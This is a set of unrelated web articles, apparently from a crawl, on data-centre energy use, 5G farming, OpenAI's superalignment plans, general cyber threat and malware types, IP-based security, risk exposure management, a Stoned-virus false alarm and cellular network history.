Powering the internet uses swathes of electricity, largely via the use of data centres. On average, servers and cooling systems account for the greatest share of direct electricity use in data centres, followed by storage drives and network devices. Some of the world’s largest data centres each contain tens of thousands of IT devices and require more than 100 megawatts (MW) of power capacity – enough to power around 80,000 U.S. households.
The rapid growth in internet traffic and global internet users has raised concerns that the increase in energy usage of data centres could have negative impacts on the climate, with some media headlines warning that a “‘Tsunami of data’ could consume one fifth of global electricity by 2025”.
However, despite the rapid growth in demand for information and data centre services over the past decade, net energy usage has remained surprisingly flat at 1-2 per cent of global electricity usage. This is likely due to exponential increases in computational energy efficiency and new developments in technology.
For example, the ability to run multiple applications on a single server has significantly reduced the energy intensity of each hosted application, and the shift to larger and more efficient cloud and hyperscale data centres has allowed for the use of ultra-effective cooling systems which reduce energy consumption.
The reduction of other emissions
The potential that IT presents for reducing other kinds of emissions should not be forgotten. By optimising IT, companies can reduce their energy usage, cut costs, and improve their operational efficiency.
When companies utilise cloud-based servers and platforms, for example, they can reduce the need for physical paperwork. And because these systems can be accessed from any location, employees can work remotely, reducing the emissions caused by commuting.
We’ve previously explored how smart technology can be used to reduce household energy usage by harnessing sensors which monitor electricity use, can remotely switch equipment off, and identify areas where consumption can be reduced. The same principle applies to major corporate companies and production lines, where sensors can be used to identify and measure which networking and non-IT equipment is consuming high volumes of power.
On the global stage...
The Internet of Things (IoT) allows these connected devices to ‘talk’ to one another, communicating huge volumes of data in seconds. As increasing amounts of useful energy data is collected, more connections can be made and correlations gleaned. By gathering industry-specific information, there is a better chance of building a more complete picture on global energy usage and, more importantly, identifying areas for improvement.
By harnessing new technology and prioritising innovation within the IT industry, the overall impact of IT and data centres on the climate will continue to shrink, offering a significant contribution to the net zero goals of the tech sector and the UK government.
Back down to earth
However, not all companies will have the resources or in-house know-how to utilise IT to make themselves more energy efficient. Which is why having the best talent to help drive and implement this change is so crucial. For businesses to make progress in this area they will need innovative, forward thinkers with technical expertise. Sound like you? Get in touch with the team today. | <urn:uuid:ca99b1b7-f16f-4dc1-bdee-8a2b391930da> | CC-MAIN-2024-38 | https://www.hamilton-barnes.com/resources/blog/how-it-can-help-tech-companies-to-reach-net-zero/ | 2024-09-13T05:00:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00292.warc.gz | en | 0.942545 | 1,097 | 2.9375 | 3 |
In the ongoing quest to develop cheaper, more effective means of agriculture, about three significant revolutions have taken place so far.
The first major revolution was the transition from hunting and gathering to farming. The second coincided with the industrial revolution, improving farmers’ ability to bring their goods to market. Hybridization and genetic engineering marked the third revolution with the increased use of chemical pesticides and fertilizers.
The fourth revolution, known as smart farming, is still in its early stages. Drawing on connected devices throughout the food supply chain, smart farming promises greater speed, safety, and dependability using technologies like drones and AI. Powering this innovation are faster 5G networks, with tremendous opportunity for improved tracking, sustainability, and more efficient resource deployment at scale.
Improved Food Tracing and Logistics
Farmers have long looked for more efficient ways to bring their goods to market. Many already use technologies like GPS and Enterprise Resource Planning (ERP) to track, transmit and analyze product data in real time. 5G-connected IoT devices represent the next step in this evolution, offering lower latency and faster speeds for transmitting conditions, temperature, safety, humidity level, and other factors. That is a huge safety improvement to the food supply chain. Widespread use of 5G-connected devices opens the door to better product tracing for recalls, for example, with detailed visibility into storage facilities, delivery vehicles and processing plants. Additionally, potentially contaminated produce may be confined to a single acre or row, supporting the FDA's Food Safety Modernization Act in the United States (FSMA) and similar regulations in the European Union.
Greater Efficiency and Sustainability
Higher bandwidth is needed to enable more sophisticated technologies like drones and autonomous vehicles. Private 5G networks afford this level of automation, with the speed and service assurance needed to complete tasks such as planting, watering or harvesting. Data collected during these processes can also provide predictive analytics modeling to test improvements to yield and sustainability.
Of course, It’s not just the tracing and delivery parts of the food supply chain that benefit from 5G networks’ capabilities. Farms can be made more efficient and sustainable in their use of natural resources. Using IoT devices to monitor soil conditions, temperature, water quality and use, the health and location of animals, the temperature of refrigerators or ovens, or the presence of contaminants in real-time and across an entire enterprise not only frees up human labor for actual problem solving and innovation but introduces opportunities to reduce water, feed, energy and fuel consumption. The bottom line is that the edge monitoring and computing power of 5G networks is key to these improvements in sustainability.
Enabling Autonomous Cleaning and Transportation
Spurred by the COVID-19 pandemic’s depletion of the workforce and increased requirements for cleaning and disinfecting, manufacturers and warehouses, among others, are turning to autonomous cleaning robots, which can meet expanded cleaning regulations. Floor-scrubbing robots use artificial intelligence (AI)-driven navigation and 5G to provide consistent and ceaseless cleaning for warehouse and factory floors. Additionally, autonomous vehicles are also revolutionizing food production in farm fields. Both Monarch and John Deere announced fully autonomous tractors in 2022. These tractors, and others like them, rely on the low-latency connectivity 5G offers for real-time response and remote monitoring and control. Together, these smart machines could save hundreds of hours in labor each year.
The importance of 5G-enabled IoT devices for safety, tracing, efficiency and planning in the modern food supply chain cannot be denied. They’re becoming integrated into mainstream food production and could soon be as necessary as they are ubiquitous. Whether a communications service provider (CSP) provides the connectivity, or an enterprise opts for private 5G, smart farming requires a network that is secure and allows for visibility all the way to the edge to maintain efficient operation and deliver service quality. Whatever happens in the long term, the advances in smart farming and food supply chain monitoring enabled by 5G technologies are already revolutionizing food production and delivery.
About the Author
You May Also Like | <urn:uuid:30b4f591-9b01-480a-8904-f23b2fb4d79c> | CC-MAIN-2024-38 | https://www.iotworldtoday.com/connectivity/can-5g-networks-enable-faster-cheaper-food-production- | 2024-09-14T10:22:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.22/warc/CC-MAIN-20240914093425-20240914123425-00192.warc.gz | en | 0.932611 | 836 | 3.234375 | 3 |
Artificial intelligence lab OpenAI is launching a new “alignment” research division, designed to prepare for the rise of artificial superintelligence and ensure it doesn’t go rogue. This future type of AI is expected to have greater than human levels of intelligence including reasoning capabilities. Researchers are concerned that if it is misaligned to human values, it could cause serious harm.
Dubbed “superalignment”, OpenAI, which makes ChatGPT and a range of other AI tools, says there needs to be both scientific and technical breakthroughs to steer and control AI systems that could be considerably more intelligent than the humans that created it. To solve the problem OpenAI will dedicate 20% of its current compute power to running calculations and solving the alignment problem.
AI alignment: Looking beyond AGI
OpenAI co-founder Ilya Sutskever and head of alignment Jan Leike wrote a blog post on the concept of superalignment, suggesting that the power of a superintelligent AI could lead to the disempowerment of humanity or even human extinction. “Currently, we don’t have a solution for steering or controlling a potentially superintelligent AI, and preventing it from going rogue,” the pair wrote.
They have decided to look beyond artificial general intelligence (AGI), which is expected to have human levels of intelligence, and instead focus on what comes next. This is because they believe AGI is on the horizon and superintelligent AI is likely to emerge by the end of this decade, with the latter presenting a much greater threat to humanity.
Current AI alignment techniques, used on models like GPT-4 – the technology that underpins ChatGPT – involve reinforcement learning from human feedback. This relies on human ability to supervise the AI but that won’t be possible if the AI is smarter than humans and can outwit its overseers. “Other assumptions could also break down in the future, like favorable generalisation properties during deployment or our models’ inability to successfully detect and undermine supervision during training,” explained Sutsker and Leike.
This all means that the current techniques and technologies will not scale up to work with superintelligence and so new approaches are needed. “Our goal is to build a roughly human-level automated alignment researcher. We can then use vast amounts of compute to scale our efforts, and iteratively align superintelligence,” the pair declared.
Superintelligent AI could out-think humans
OpenAI has set out three steps to achieving the goal of creating a human-level automated alignment researcher that can be scaled up to keep an eye on any future superintelligence. This includes providing a training signal on tasks that are difficult for humans to evaluate – effectively using AI systems to evaluate other AI systems. They also plan to explore how the models being built by OpenAI generalise oversight tasks that it can’t supervise.
There are also moves to validate the alignment of systems, specifically automating the search for problematic behaviour externally and within systems. Finally the plan is to test the entire pipeline by deliberately training misaligned models, then running the new AI trainer over them to see if it can knock it back into shape, a process known as adversarial testing.
“We expect our research priorities will evolve substantially as we learn more about the problem and we’ll likely add entirely new research areas,” the pair explained, adding the plan is to share more of the roadmap as this evolution occurs.
The main goal is to achieve the core technical challenges of superintelligence alignment – known as superalignment – in four years. This plays to the prediction that the first superintelligence AI will emerge within the next six to seven years. “There are many ideas that have shown promise in preliminary experiments,” according to Sutsker and Leike. “We have increasingly useful metrics for progress and we can use today’s models to study many of these problems empirically.”
AI safety is expected to become a major industry in its own right. Nations are also hoping to capitalise on the future need to align AI to human values. The UK has launched the Foundation Model AI Taskforce with a £100m budget to investigate AI safety issues and will host a global AI summit later this year. This is likely to focus on the more immediate risk from current AI models, as well as the likely emergence of artificial general intelligence in the next few years. | <urn:uuid:a0cc975f-9974-4495-8369-e9c2d5e48132> | CC-MAIN-2024-38 | https://www.techmonitor.ai/digital-economy/ai-and-automation/ai-alignment-openai-superintelligence-superalignment | 2024-09-15T18:11:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651632.84/warc/CC-MAIN-20240915152239-20240915182239-00092.warc.gz | en | 0.959743 | 918 | 2.734375 | 3 |
13 May Cyber Security Portland Cyber threats to Avoid
Our everyday operations, activities and work to be done are being created and do using our technological resources. However, there are cyber threats that are inevitable and must be put to stop so that it won’t put your business in danger. Generally, according to Cyber Security Portland, there are two types of cyber-attack, one is called passive and the other one is active attacks.
Let us start with passive attacks, this type of attack does not make any changes, deletion or any modification to your data and information. However, they can see right through your data, observes it and analyze it and even copy it for their own personal gain. You may not find this harmful, but the data that is collected from your business or institution is put to risk because they can be seen by this hacker and this may bring potential harm to you and your clients or anyone’s information that you hold. Since this type of attack is not active, you won’t feel its effect thus it is very hard to detect since they are not trying to break into the system.
According to Cyber Security Portland, some of the attacks that hackers or cyber criminals might do to your business that you would not notice for example is a traffic analysis. With a traffic analysis, your hacker can view everything about your network, like those who visits your website, files that people can download and the likes. Also, your hackers can eavesdrop. With this passive attack, they can hear and read communications like phone calls and emails. Also, another passive cyber-attack is called scanning. This type of attack is when your hacker can identify the network vulnerabilities of your system such as a weak operating system or like open ports in your system.
Another type of cyber-attack, according to Cyber Security Portland are active attacks. These attacks can be easily seen since they pursue to modify your data and information and obtain them. Usually, these attacks have occurred when you have your data changed, or even your IT infrastructure and system. Some of the attacks that do this are what you called denial-of-service attack, this is an example of active attacks where your services are being disrupted and they are being overloaded, you cannot even render them and it will be made unavailable for your users. Also, another example of active cyber-attack, according to Cyber Security Portland, is spoofing, this type of attack is when emails that have sent to you are not them or just pretending to be someone they are not.
Also, Cyber Security Portland includes what they call message modification as an example of active cyber attack which modifies your message during the transmission, so, your receiver might receive a modified message and changed your message in some way. Furthermore, another example of an active cyber-attack, according to Cyber Security Portland are viruses and malwares. This is the most common and the most famous way of active cyber-attack. This cyber-attack is design in a manner that they will intrude your network or system, and damage them and obtain information that are critical and sensitive. This type of cyber attack is often spread using emails or downloads that would look like legitimate. This are being used by hackers and criminals to make money or when they have political motivation to hack or actively attack you.
There are different types of malware, according to Cyber Security Portland, one is called a virus, this is a program that self-replicates, just like a virus, it attaches into a host, in this case a clean file so that it can spread in your system and basically infecting your files. Another example of malwares, according to Cyber Security Portland, is a trojan, this malware is pretending to be a legitimate software and users then are being tricked into getting trojans into their system, not that it just collects data, it also damages them severely.
Furthermore, another example of a malware is called a spyware. This malware records what you do in your computer, and with that, hackers or cyber criminals will be able to get important information from you, and you do not have even a slightest idea, they can even get credit card details and bank information from you by observing your actions. Next is called a ransomware, this type of malware lock’s your data, files and information, and even threats you that the hackers or cyber criminals will erase them if you don’t pay them.
Another one, according to Cyber Security Portland is called an adware. This type of malware enters through advertising software. In this way, they spread the malware and you will see how it affects your computer or system later on. There is also a malware called botnets, when this kind of malware infects your computer, the hackers and cyber criminals can do online tasks without you giving them permission or authorization, they are somewhat pretending to be you and doing actions that you have no idea of. Those are just some types of malwares that could enter your system. With the threat it poses, and danger that you may experience if you let them in, you better be aware of how to avoid this threat and keep your technological resources safe and even your IT infrastructure.
In this way, Cyber Security Portland can help you, they can provide you the cyber security you need like having your software and operating system always updated, which means that you also get the latest patches for security. They can also provide you anti-virus software that are essentials in the business, its like your first line of defense and detectors of virus. Also, they can guide you on creating strong passwords, so that your accounts are well protected, and are very safe. They can even create security for your internet, network and the whole business system. Thus, if you want to have your cyber security up, you must call in and ask for help from Cyber Security Portland.
Share this post: | <urn:uuid:6f183b1d-ecfa-4869-9eb3-06761c444495> | CC-MAIN-2024-38 | https://www.bytagig.com/articles/cyber-security-portland-cyber-threats-to-avoid/ | 2024-09-16T18:52:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00892.warc.gz | en | 0.965153 | 1,191 | 2.515625 | 3 |
It’s also largely ineffective
The Internet works largely because of DNS. The ability to match a site with an IP address – needed to route requests and responses across the Internet – is what ultimately makes the Internet usable. The majority of users are likely blissfully unaware of IP addressing in the first place. Because cheese.com is just far easier to remember.
But this association – of a singular identity with an IP address – is now so tightly ingrained in our heads that we tend to apply it to other areas of technology. Even when it’s utterly ineffective.
Back in the day, IP addresses were fairly fixed things. Routes were flexible, IP addresses for the most part stayed where they were assigned. Today, however, IP addresses are like candy. They’re handed out and traded with greater frequency than SPAM hits my inbox.
Cloud commodified the network. IP addresses are mine only as long as the resource it was assigned to is in service. Mobile, too, has played a role in turning IP addresses into virtually meaningless octets. A quick search will yield a variety of technical dramas in which a legitimate business running an app in a public cloud has been blocked automatically by denylists because the previous assignee of that IP address used it improperly.
Add in the modern, connected home with its growing number of Internet-reliant gadgets and there is absolutely no value in matching IP addresses to any individual thing or person.
Traditional security that relies on IP addresses – usually through denylisting and blocking – fails in the face of this flexibility.
So it’s not surprising when a report pops up noting that the ability to IP-shifting habits of bad bots makes it difficult to identity and block them. Particularly those bots who’ve attached themselves to a mobile device.
Using IP addresses as the basis for identifying anything – devices, bots, users – is lazy. It’s the simplest piece of data to extract, yes, but it’s also the least trustable.
This is not new. The information security industry has been preaching for several years now that traditional, signature-based techniques are not going to protect us any more. That’s because they’re based on the premise that bad actors are recognizable; that we know what they look like. While that’s true, it’s only true for yesterday’s attacks. It doesn’t really help us with tomorrow’s attack, because we have no idea what that’s going to look like.
Combined with the increased use of end-to-end encryption by everything – including malware – traditional security options are left guessing as to whether any given interaction is legitimate or malicious. Rendered blind by encryption, signature-based solutions become little more than bumps in the wire. Without the ability to inspect traffic, security on the wire is a dying breed of technology at which bots sneer as they pass by on their way to make a home amongst your resources.
It takes minimal effort to use IP addresses alone to identify endpoints. When paired with information like the user-agent from an HTTP header (which is user input and itself inherently untrustable) there are barely measurable improvements in success. With the processing power available to us today there is no reason we cannot take a few microseconds to extract from connections and interaction a broader array of characteristics from which we can deduce if not identity, then at least intent.
Using IP addresses or signatures alone isn’t enough to protect apps and networks from infiltration. Behavioral analysis, challenge-response, and deep inspection will need to be used together to effectively weed out the bad from the good. | <urn:uuid:c07ae135-aafa-4442-9705-e861c21ac104> | CC-MAIN-2024-38 | https://www.f5.com/pt_br/company/blog/the-ip-address-as-identity-is-lazy-security | 2024-09-16T20:27:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00892.warc.gz | en | 0.95723 | 756 | 2.546875 | 3 |
The art of risk assessment has long been a crucial element of military strategy and decision-making – and it remains critical to today’s best practices in cybersecurity defense.
Abraham Wald, a mathematical genius, played a pivotal role in revolutionizing the understanding of hidden risk and exposure with his innovative work on aircraft survivability. During World War II, the US air force wanted effective methods to protect aircraft against enemy fire. Wald’s innovative approach stood out.
Unlike conventional ways of reinforcing heavily damaged and bullet-struck areas (Fig. 1), Wald analyzed data on returning aircraft with bullet holes and proposed something unique. He shifted attention to the untouched regions of those planes to reveal critical insights into where reinforcement was most needed.
Wald’s logic was irrefutable: The absence of bullet holes in certain sections of aircraft wasn’t due to luck. It was because the planes hit in those areas simply never made it back.
Wald’s ‘survivorship bias’ methodology offers a compelling analogy for today’s risk management. We need to think more strategically to gain a deeper understanding of risk – and not allow selective ‘success’ filters dissuade the mission. It’s time to accept there are hidden risks from limited visibility — and that hidden risks are a persistent threat to business and to human safety.
Targeting the Blind Spots in Cybersecurity
Today’s landscape is complex and constantly evolving, especially with the widespread use of Internet of Things (IoT) – and Operational Technology (OT). By 2028, connected IoT devices will expand to over 25 billion. They have significantly expanded the attack surface creating new challenges and vulnerabilities.
Uncovering blind spots is what Wald teaches us. By adopting his holistic approach to assess the entire situation rather than only visible damage, cybersecurity teams need comprehensive visibility. These blind spots may include unmanaged devices, including bring your own devices (BYOD) that connect and disconnect from the network — and third-party devices linked to the network.
With a clear view of all cyber assets, applications and networks, security professionals can identify potential vulnerabilities and exploitable weak points. Enhanced visibility promotes a more targeted and efficient cybersecurity strategy. With it, organizations can:
- Allocate resources more effectively
- Implement robust defenses more efficiently
- Proactively mitigate these blind spots before they become targets
Forescout’s Risk and Exposure Management (REM) solution can easily identify and classify all cyber assets and their exposure attributes giving real-time awareness of an entire organization’s attack surface (Fig. 2).
Our research shows there have been more than 420 million attacks per year at more than 13 attacks per second. Complete visibility is essential. Blindly strengthening cybersecurity defenses without full visibility is like reinforcing random sections of an aircraft without knowing where vulnerabilities lie —or where breaches are likely to occur.
Piercing the Risk Exposure Patterns
Traditional risk assessment methods struggle to capture dynamic risk and rely too heavily on historical data or visible incidents only. It may not fully represent emerging threats. By acknowledging where data gaps or biases exist, organizations can refine their assessment and mitigation strategies more effectively. Like Wald’s approach, security teams must move beyond surface-level assessments to quantify risk. It involves evaluating the likelihood of threats, leveraging threat intelligence feeds and implementing techniques using advanced analytics to uncover hidden patterns and anomalies.
Gartner predicts that organizations prioritizing their security investments based on ‘continuous threat exposure management’ will realize a two-thirds reduction in breaches by 2026. To achieve this level of risk reduction, it is incumbent on organizations to adopt proactive approaches, such as a risk scoring framework to assess all risk factors — including severity, likelihood of exploitation and potential impact on business operations.
A data-driven methodology like Wald’s allows organizations to prioritize decision-making based on the actual level of risk using probability and potential impact (Fig. 3).
The Forescout REM solution correlates a wide range of asset exposure factors with asset criticality to facilitate prioritization based on a business risk score. It can identify all asset vulnerabilities and pinpoint which ones are actively exploited by attackers. Plus, it can assess the exposed services of each asset, identify configuration weaknesses, such as default credentials or insecure protocols — and detect compliance violations.
Bulletproof Risk Resilience Automatically
Organizations have realized how impractical it is to address every vulnerability and exposure within their environment. Wald’s advice on reinforcing vulnerable areas of aircraft to decrease damage risk mirrors the concept of actionable plans and workflows to reduce cybersecurity exposures.
An efficient risk mitigation strategy relies on a remediation approach that weighs the importance of assets or business functions against the likelihood or evidence of exploitation. This method not only helps in reducing vulnerabilities and averting potential threats but plays a crucial role in enhancing organizational resilience.
The Forescout REM solution helps users prioritize mitigation and remediation actions to offer the most significant return on investment by reducing risk. Through REM, organizations can assess and prioritize risks holistically and granularly — at the device level and across the entire organization (Fig. 4). Utilizing the Forescout platform capabilities, REM solution enables automated response actions based on the asset’s risk level allowing security teams to reduce risk and exposure efficiently.
Close Your Security Blind Spots with Forescout REM
In the complex dance of cybersecurity, the continuous cycle of identifying, prioritizing and minimizing exposures acts as the backbone of a resilient defense strategy. This dynamic process serves as a conduit for fortifying a resilient cybersecurity posture. Move beyond vulnerability management. Not only can you detect and mitigate current vulnerabilities, but you will adapt quickly to emerging cyber threats.
The Forescout REM solution is powerful and provides unparalleled visibility into the full spectrum of your connected network assets – managed or unmanaged. Identify all connected assets, including your most critical ones, using active or passive methods, from initial discovery to detailed classification. Eliminate the security guesswork with actionable recommendations to confidently close your exposure and compliance gaps with proactive controls.
Go deeper: Learn how to decode cyber risk and take action, today. Join Reza Koohrangpour on May 30 for “Closing the Gap: A Proactive Approach to Mitigating Risk” | <urn:uuid:0e25f7d2-2a51-43ba-a1de-630766346924> | CC-MAIN-2024-38 | https://www.forescout.com/blog/beyond-bullet-holes-unveiling-cybersecuritys-hidden-risk-exposures/ | 2024-09-18T02:48:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00792.warc.gz | en | 0.926462 | 1,287 | 2.578125 | 3 |
If you’re an IT greybeard you might recall the Stoned virus.
It first appeared in 1987 at the University of Wellington, New Zealand, infecting floppy disks and the partition sector of hard disks.
If your PC was infected with Stoned then every write-enabled floppy disk that you accessed could also become a carrier for the virus, which was taken around the globe by sneakernet.
If you were silly enough to leave an infected floppy disk in your A: drive, and turn on your computer it would try to boot up from the floppy, and become infected by the Stoned virus in the process.
Normally there would be no visual clue of an infection.
But one in every eight times that you booted an infected PC, you might find yourself greeted with the message:
Your PC is now Stoned!
What the Stoned virus *didn’t* do, however, was infect files.
So, it’s fairly easy to conclude that the Stoned virus warning reported by some users of Microsoft Security Essentials is a false alarm.
Earlier today, a virus signature from the virus “DOS/STONED” was uploaded into the Bitcoin blockchain, which allows small snippets of text to accompany user transactions with bitcoin. Since this is only the virus signature and not the virus itself, there apparently is no danger to users in any way. However, MSE recognizes the signature for the virus and continuously reports it as a threat, and every time it deletes the file, the bitcoin client will simply re-download the missing blockchain.
The truth is that the Stoned virus hasn’t infected the Bitcoin Blockchain, and you are no risk of infecting your computer with the Stoned virus.
Of course, knowing it is a false alarm may stop some users from panicking, but it doesn’t stop the incorrect anti-virus warning that’s popping up from being any less of a nuisance to those people who have a copy of the Bitcoin blockchain.
Let’s hope that Microsoft fixes its false alarm soon, and stops looking for 25-year-old boot sector viruses in files that it cannot infect.
Via: The Register. | <urn:uuid:4a3732b9-56ee-41f6-9051-419e0b450081> | CC-MAIN-2024-38 | https://grahamcluley.com/stoned-bitcoin-blockchain/ | 2024-09-09T15:54:50Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00692.warc.gz | en | 0.96586 | 453 | 2.765625 | 3 |
Mobile phones and communications devices have been the success story of the new millennium. While they existed in fairly rudimentary forms in the 1990s, they really came into their own with the advent of the smartphone, which was backed up by a range of global cellular network types and are now indispensable.
With an estimated 14 billion devices currently in existence, and even pessimistic projections putting the 2025 total at around 18 billion handsets or more, these devices are only going to become more important and more prevalent in our lives. Alongside these handset developments, the various types of cellular networks are also rapidly evolving to make the most of the technology. As our handsets evolve, so too must the types of cellular networks that support them.
Cellular networks are a series of connected high speed, high capacity communications and data systems that offer seamless data connection together with roaming capabilities. Cellular networks allow us to move around the world without suffering a drop in our communications signals. But they have evolved to be far more than simple signal carriers. Indeed, the latest generation of cellular network types have become the powerhouses behind technology, banking, and emergency service communications.
Structure of Cellular Networks
Technically, a cellular network – often referred to as a mobile network – is a communication system where the final connection to the handset is carried out by wireless contact. The entire network is distributed over land areas known as cells, with each cell having three individual cell sites so that triangulation – the process of pinpointing the geographic location of a user – can take place.
These base stations provide the cell phone network with the coverage they need for transfer of voice and data content. A cell usually operates with different frequencies from its neighboring cells, so as to prevent signal cross-contamination interference between adjacent cells and give the best quality inside the catchment area of each one.
When interconnected, these cells provide radio coverage over a very wide geographic area. This enables equipment such as mobile phones, tablet computers and laptops equipped with modems to communicate with each other and with fixed transceivers and telephones anywhere in the network, via the base stations.
The cellular network system has more capacity than a single large transmitter while using less power since the cell towers are closer together, making communications between cells fast and effective. Furthermore, they offer a much larger coverage area than a single terrestrial transmitter, since additional cell towers can be added indefinitely and they are not limited by a line of sight connection, which stops at the horizon.
History of Cellular Network Types
1G Basics. The origins of cellular networks were founded in the early 1980s and development of the 900Mhz analogue signal, and managed to last almost twenty years before it was superseded by the much more flexible GSM technology. Though it was never really referred to as 1G, it worked well with the technology of the time, but was gradually surpassed by 2G – which was referred to by that term right from the start – which offered greater potential and flexibility. The 900MHz signal was finally discontinued in June 2001.
2G. One of the most important cellular network types in the history of mobile evolution. Being digital, the Global System for Mobile Communications – otherwise known as GSM, or 2G – represented a huge improvement over the 900MHz analogue signals and improved reception right across the globe. One of the main reasons for change was the potential for greater data transfer rates, which many of the emerging online industries were demanding to enhance their internet presence. Theoretically, 2G could transfer data at 40 kbit/s, though the structure of the primarily ground-based network often hindered this. It was plain that the infrastructure of this cellular network type was its limiting factor, and work continued on improving it along with the actual physical handsets.
Rise of 3G. On the inevitable road to 3G, the 2G network underwent a couple of iterations to improve its usability (2.5G, 2.75G, etc.), but even those upgrades to the various cellular network types that emerged weren’t sufficient to prevent the introduction of the next generation of communications.
Operating at the 1900 MHz and 2100 MHz bands, 3G was otherwise referred to as UMTS, (Universal Mobile Telecommunications Service) in European markets, and CDMA2000 in the USA. The system made huge improvements to the carrier infrastructure, allowing for a range of cell phone network types and a broader range of multimedia content at greater bandwidths than 2G. The rise of 3G can be identified as the moment when communications became less about simple phone calls and started to focus more on the possibilities of communications via other means – particularly the internet.
Fueled by a new breed of handset that had the capability for multi-media support, 3G started handsets down the path of being less about making calls and more to do with connecting with immersive content. Industrious and insightful app creators had the tools to make almost anything happen. From social interaction, wayfinding and entertainment through to workplace productivity and financial planning – there was an app for that.
The 3G network wasn’t simply another iteration of the 2G cellular network type – it was a massive leap forward in terms of data transfer rates and signal reliability. While 2G could sometimes operate at 40kbit/s, 3G could reliably execute up to 14Mbits/s, making the transfer and download of music and video an increasingly viable option. This was the point that devices in our pockets stopped being everyday phones and started to become small computers, capable of both entertaining us and organizing our lives.
In fact, development of further cellular network types could almost have stopped at this point. Our mobile devices were tied to a network that could handle calls from anywhere in the world and supported good download speeds. We could enjoy them for social usage, but they were also effective for work and business. Data transfer was a dream compared to the previous system. 2G networks would allow a three-minute MP3 tune to be downloaded in somewhere between six and nine minutes. The same file would take as little as between 10 to 40 seconds (depending on speed and file size) to download on the much more robust 3G network. For most people, 3G worked well and was sufficient, but mobile device and network engineers knew that both systems were capable of much more, and even while people were generally happy with 3G, the next iteration – 4G – was looming on the horizon.
4G. The solution to the issue of how more data could be transferred came from the understanding that it was possible to develop a cellular network type that could operate at much higher frequencies – which was needed to support increasingly advanced mobile devices that were fast turning into mini computers. Increases in processor speeds and with gigabytes of available memory, a fast and robust network would allow users to access interactive content and the growing number of streaming services that were becoming available.
Technically, 4G is known as the International Mobile Telecommunications Advanced (IMT-Advanced) specification, and is not designed to support traditional circuit-switched telephone-based services, but instead relies on the Internet Protocol (IP) based communications systems. This was a huge step forward in communications and offered a number of distinct advantages over traditional telephony, including:
- Lower-cost calling
- Incorporation of different cell phone networks
- Greater call reliability
- Conference-call viability
- Versatility of features
The 4G revolution was dubbed long-term evolution or LTE (or Voice over LTE (VoLTE)), and focused on better latency, resulting in much lower buffering or even no buffering at all. The goal was to have internationally supported cellular network types with download speeds between 10Mbit/s and an astonishing 10Gbit/s, making even the largest files quick and easy to download. Meanwhile, increased device storage capacities made the download and watching of films and TV shows a viable option – train journeys would never be the same again.
The massively fast speeds of these cellular network types also promoted the non-phone-based communications in real time too. Messaging services were suddenly instantaneous, further boosting both the business and social possibilities of the equipment. Faster download capabilities also meant faster and more reliable uploads to the web, and 4G became a driver for the video-based society that we were fast becoming.
However, as demand for services started to outstrip system capability, it was clear that even faster systems would be required – and systems engineers were already far-advanced on creating an infrastructure that would support greater speeds and features.
5G. While changes to the previous generations of cellular network types were always ongoing, the next big change finally entered service in early 2019, and promised to give users data transfer and downloads at up to 10Gbit/s. But 5G isn’t a complete replacement for 4G, which continues to be a perfectly good cellular network type and is still used by most handsets as their default connection. In fact, this is the case with all handsets – but a growing number are able to switch to the 5G network when needed for downloads and streaming services.
The growing 5G system has been subject to a certain amount of controversy. Technically, it uses a much shorter wavelength than previous cellular network types – generally between 2.5-3.7 GHz frequencies, putting it in the microwave level. This means that they have a more limited range, requiring many more small operating cells than the 4G system. Coupled with this, the masts that make up the cells are generally more expensive to manufacture and erect, and they are currently only found in dense metropolitan areas, leaving more rural zones covered only by the 4G system.
The 5G system is still in the process of being rolled out and the next iteration is still not even specified, but undoubtedly phone manufacturers will be looking to how they can improve and increase their next generation of hardware to incorporate even higher delivery frequencies.
These different cell phone networks have been the backbone of data transfer and communications. They have transformed not only how we work, but spend our relaxation time too. Mobile phones and other communications devices use these various cellular network types effectively and with increasing speed. Because they are so effective, they have spawned the creation of other equipment – such as fitness trackers and navigation devices – that either piggy-back onto a mobile phone or use the system exclusively. Certainly, without the cellular network types that we are now used to, life would be very different, and definitely not as interesting. | <urn:uuid:dc51b4c3-c66f-4168-8afe-7437311d6f6f> | CC-MAIN-2024-38 | https://itchronicles.com/mobile/cellular-network-types/ | 2024-09-10T21:47:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00592.warc.gz | en | 0.972272 | 2,135 | 3.625 | 4 |
This format holds numeric data items in computer storage in pure binary two's complement representation. In this format, number values are held in radix of 2 where each computer bit in the representation starting from the right (least-significant) end represents the presence or absence of an increasingly significant power of 2 in that value. Negative numbers are represented by complementing (inverting all the bit values of) their positive counterpart, and then adding one to the whole. Storage requirements depend on the number of "9"s in the PICTURE clause, and whether the numeric data item is signed or unsigned (see the topics The PICTURE Clause, The SIGN Clause and The USAGE Clause); also your COBOL system assigns storage for COMPUTATIONAL items in one of two modes; byte-storage and word-storage. Byte-storage is the default storage-assignment mode for this COBOL implementation. | <urn:uuid:0984acf9-458d-4885-9876-f7b7aed1dca9> | CC-MAIN-2024-38 | https://www.microfocus.com/documentation/visual-cobol/vc60/DevHub/HRLHLHCLANU040.html | 2024-09-12T02:02:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00492.warc.gz | en | 0.855386 | 184 | 2.90625 | 3 |
Trillions of connections to billions of devices, all of them “smart.” That’s the future. Digital transformation at its best. New wireless technologies are just now emerging and evolving more every day that will enable industries to thrive again. It’s the dream of the future for industries like aviation, logistics, manufacturing and more, to overcome production and efficiency challenges, supply chain and labor shortages, while meeting public and commercial demands. Can we meet the challenge of this industrial “Internet of everything” while finally making it private, secure, and risk-free?
The answer is yes. But how do we get there?
